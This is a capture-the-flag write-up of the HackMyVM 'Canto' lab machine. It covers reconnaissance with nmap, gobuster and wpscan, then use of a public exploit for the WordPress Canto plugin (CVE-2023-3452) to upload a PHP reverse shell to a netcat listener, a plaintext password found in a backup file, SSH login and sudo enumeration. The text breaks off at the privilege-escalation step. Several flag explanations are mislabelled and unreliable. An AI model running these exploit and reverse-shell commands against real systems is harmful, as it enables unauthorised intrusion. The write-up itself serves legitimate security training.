Canto Write-Up

PreviousBreakout Write-Up NextConnection Write-Up

Last updated 5 months ago

Canto Write-Up

Introduction

In this write-up, I will guide you through the steps I took to complete the HackMyVM - Canto CTF challenge. The objective is to gain root access to the target machine by exploiting identified vulnerabilities. Checkout the video (to be updated).

TL;DR

Reconnaissance

Network/Port Scanning (Nmap)

Command:

nmap -sV -sC -vv -oA canto 172.16.100.9

Explanation:

nmap: Tool used to scan network and ports to discover which services are running.
-sV: Perform version detection of services.
-sC: Scan using default scripts.
-oA: Output in filename "canto".
172.16.100.9: IP address of Canto VM on my network.

Output:

# Nmap 7.94SVN scan initiated Wed Aug 28 00:02:12 2024 as: nmap -sC -sV -vv -oA canto 172.16.100.9
Nmap scan report for 172.16.100.9
Host is up, received syn-ack (0.024s latency).
Scanned at 2024-08-28 00:02:21 PDT for 12s
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c6:af:18:21:fa:3f:3c:fc:9f:e4:ef:04:c9:16:cb:c7 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKkMLZHCokv5rpKTUUfitgdTSiyieZXC1kqsQS8DEnLgk6x5fOmlzHim2qgiwoJhyEJa7Nj1k3K6pwm5RVxEjEU=
|   256 ba:0e:8f:0b:24:20:dc:75:b7:1b:04:a1:81:b6:6d:64 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDR8+o8qabpIHzS2zgBZDxfX0Tm5eWBBstEt5QeYN04+
80/tcp open  http    syn-ack Apache httpd 2.4.57 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 6.6.1
|_http-title: Canto
|_http-server-header: Apache/2.4.57 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 28 00:02:33 2024 -- 1 IP address (1 host up) scanned in 20.37 seconds

Findings:

We see that there is a web server running on port 80.

Let's check out the web server and in the background we can run gobuster to brute force web directories.

Directory Brute-forcing (Gobuster)

Command:

gobuster dir -u http://172.16.100.9 -w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html

Note: I have setup an alias to run gobuster inside a docker container.

Alias: alias gobuster='docker run -it --rm --name gobuster -v /home/ayush/Tools/SecLists/:/SecLists ghcr.io/oj/gobuster'

Explanation:

dir: Mode of operation indicating directory/file enumeration.
-u http://172.16.100.9: Base URL of the target web server to scan.
-w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt: Base URL of the target web server to scan.
-x php,txt,html: Search for the PHP, HTML and TXT file extensions.

Output:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.100.9
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/wp-content           (Status: 301) [Size: 317] [--> http://172.16.100.9/wp-content/]
/index.php            (Status: 301) [Size: 0] [--> http://172.16.100.9/]
/wp-login.php         (Status: 200) [Size: 4735]
/license.txt          (Status: 200) [Size: 19915]
/wp-includes          (Status: 301) [Size: 318] [--> http://172.16.100.9/wp-includes/]
/readme.html          (Status: 200) [Size: 7409]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 315] [--> http://172.16.100.9/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://172.16.100.9/wp-login.php?action=register]
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1273832 / 1273833 (100.00%)
===============================================================
Finished
===============================================================

Findings:

The directories show that the web server is running Wordpress.

Enumerating WordPress (wpscan)

Command:

wpscan --url http://172.16.100.9/ --detection-mode aggressive --enumerate u,vt,tt,vp --plugins-detection aggressive

Explanation:

--url http://172.16.100.9/: Do all simple enumeration (-U -S -G -P -r -o -n -i).
--detection-mode aggressive: IP of the target samba server to enumerate.
--enumerate u,vt,tt,vp:
--plugins-detection aggressive:

Output:

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://172.16.100.9/ [172.16.100.9]
[+] Started: Wed Aug 28 07:14:02 2024

Interesting Finding(s):

[+] XML-RPC seems to be enabled: http://172.16.100.9/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://172.16.100.9/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://172.16.100.9/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://172.16.100.9/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:12 <==========================================================================> (702 / 702) 100.00% Time: 00:00:12
[i] The WordPress version could not be detected.

[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:15 <=========================================================================> (7343 / 7343) 100.00% Time: 00:00:15
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] canto
 | Location: http://172.16.100.9/wp-content/plugins/canto/
 | Last Updated: 2024-07-17T04:18:00.000Z
 | Readme: http://172.16.100.9/wp-content/plugins/canto/readme.txt
 | [!] The version is out of date, the latest version is 3.0.9
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://172.16.100.9/wp-content/plugins/canto/, status: 200
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: Canto <= 3.0.8 - Unauthenticated Blind SSRF
 |     References:
 |      - https://wpscan.com/vulnerability/29c89cc9-ad9f-4086-a762-8896eba031c6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28976
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28977
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28978
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24063
 |      - https://gist.github.com/p4nk4jv/87aebd999ce4b28063943480e95fd9e0
 |
 | [!] Title: Canto < 3.0.5 - Unauthenticated Remote File Inclusion
 |     Fixed in: 3.0.5
 |     References:
 |      - https://wpscan.com/vulnerability/9e2817c7-d4aa-4ed9-a3d7-18f3117ed810
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3452
 |
 | [!] Title: Canto < 3.0.7 - Unauthenticated RCE
 |     Fixed in: 3.0.7
 |     References:
 |      - https://wpscan.com/vulnerability/1595af73-6f97-4bc9-9cb2-14a55daaa2d4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25096
 |      - https://patchstack.com/database/vulnerability/canto/wordpress-canto-plugin-3-0-6-unauthenticated-remote-code-execution-rce-vulnerability
 |
 | [!] Title: Canto < 3.0.9 - Unauthenticated Remote File Inclusion
 |     Fixed in: 3.0.9
 |     References:
 |      - https://wpscan.com/vulnerability/3ea53721-bdf6-4203-b6bc-2565d6283159
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4936
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/95a68ae0-36da-499b-a09d-4c91db8aa338
 |
 | Version: 3.0.4 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://172.16.100.9/wp-content/plugins/canto/readme.txt
 | Confirmed By: Composer File (Aggressive Detection)
 |  - http://172.16.100.9/wp-content/plugins/canto/package.json, Match: '3.0.4'

[+] Enumerating Vulnerable Themes (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:02 <===========================================================================> (652 / 652) 100.00% Time: 00:00:02

[i] No themes Found.

[+] Enumerating Timthumbs (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:05 <=========================================================================> (2568 / 2568) 100.00% Time: 00:00:05

[i] No Timthumbs Found.

[+] Enumerating Users (via Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <=============================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] erik
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://172.16.100.9/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Wed Aug 28 07:14:50 2024
[+] Requests Done: 11900
[+] Cached Requests: 10
[+] Data Sent: 3.196 MB
[+] Data Received: 43.609 MB
[+] Memory used: 396.051 MB
[+] Elapsed time: 00:00:47

Findings:

A user erik was found.
A vulnerable plugin canto was found which allows Remote File Inclusion and Remote Command Execution.

Visiting Web Page (Port 80)

This is a normal landing page with no special features. There is no extra information in the source code.

Exploiting The Vulnerability

Finding Exploit File

Let's search the ExploitDB to look for an exploit of the vulnerable plugin.

Command:

searchsploit canto

Output:

------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)                                                      | windows/dos/45095.py
Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)                                                              | multiple/webapps/49189.txt
Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)                             | php/webapps/51826.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------

We will use the 3rd exploit as that is the one that is relevant in our case.

Get the path of the exploit and copy it to your current directory.

Command:

searchsploit -x php/webapps/51826.py
cp /usr/share/exploitdb/exploits/php/webapps/51826.py .

Output:

  Exploit: Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
      URL: https://www.exploit-db.com/exploits/51826
     Path: /usr/share/exploitdb/exploits/php/webapps/51826.py
    Codes: N/A
 Verified: False
File Type: <missing file package>

Running The Exploit

Let's understand how the exploit works.

Command:

python3 51826.py

Output:

usage: 51826.py [-h] -u URL [-s SHELL] -LHOST LOCAL_HOST [-LPORT LOCAL_PORT] [-c COMMAND] [-NC_PORT NC_PORT]

Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Vulnerable URL
  -s SHELL, --shell SHELL
                        Local file for web shell
  -LHOST LOCAL_HOST, --local_host LOCAL_HOST
                        Local web server IP
  -LPORT LOCAL_PORT, --local_port LOCAL_PORT
                        Local web server port
  -c COMMAND, --command COMMAND
                        Command to execute on the target
  -NC_PORT NC_PORT, --nc_port NC_PORT
                        Listener port for netcat

    Examples:
    - Check the vulnerability
    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33

    - Execute a command
    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'

    - Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.
    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php

usage: 51826.py [-h] -u URL [-s SHELL] -LHOST LOCAL_HOST [-LPORT LOCAL_PORT] [-c COMMAND] [-NC_PORT NC_PORT]

Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Vulnerable URL
  -s SHELL, --shell SHELL
                        Local file for web shell
  -LHOST LOCAL_HOST, --local_host LOCAL_HOST
                        Local web server IP
  -LPORT LOCAL_PORT, --local_port LOCAL_PORT
                        Local web server port
  -c COMMAND, --command COMMAND
                        Command to execute on the target
  -NC_PORT NC_PORT, --nc_port NC_PORT
                        Listener port for netcat

    Examples:
    - Check the vulnerability
    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33

    - Execute a command
    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'

    - Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.
    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php

I made a copy of the exploit file so that I can directly copy the commands given in the example.

cp 51826.py CVE-2023-3452.py

We can give a PHP Reverse Shell file as an argument to the exploit. So let's do that.

Download the reverse shell from https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Make the necessary changes in the code as shown.

Now, our exploit is ready with the reverse shell. We start our listener.

Command:

nc -lvnp 9000

Now we exploit.

Command:

python3 CVE-2023-3452.py -u http://172.16.100.9 -LHOST 172.16.5.10 -s php-reverse-shell.php

Output in listener:

First thing we do, is upgrade the shell.

python3 -c 'import pty;pty.spawn("/bin/bash")';

User (erik) Access

During our WordPress enumeration we had found an user erik. On checking out his /home/erik directory we find a notes directory that has some files in it:

This means we have to find that backups folder. So we search for a backups in the file system.

Command:

find / -name *backups* -type d 2>/dev/null

Explanation:

find /: The find command, used to search for files and directories. The / indicates that the search should start from the root directory and include all directories and subdirectories under it.
-name *backups*: Match the pattern *backups*.
-type d: Restricts the search to directories only.
2>/dev/null: This part redirects error messages to /dev/null.

Output:

find / -name *backups* -type d 2>/dev/null
/snap/core22/1439/var/backups
/snap/core22/1564/var/backups
/var/backups
/var/wordpress/backups

Findings:

The last directory /var/wordpress/backups is the one we will checkout first because that seems like the most relevant.

On checking out this directory we find a text file with the credentials of erik.

Command:

cd /var/wordpress/backups
ls -lash
cat 12052024.txt

Output:

cat 12052024.txt
------------------------------------
| Users	    |      Password        |
------------|----------------------|
| erik      | th1sIsTheP3ssw0rd!   |
------------------------------------

Now that we have the password for the erik user, we can now try SSH.

Command:

ssh erik@172.16.100.9

Output:

Read the user.txt file to get the flag:

cat user.txt

Privilege Escalation

Let's checkout the sudo permissions we have for erik. Command:

sudo -l

Output:

Matching Defaults entries for erik on canto:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User erik may run the following commands on canto:
    (ALL : ALL) NOPASSWD: /usr/bin/cpulimit

Findings:

We see that we can run the program /usr/bin/cpulimit with sudo permissions.

Command: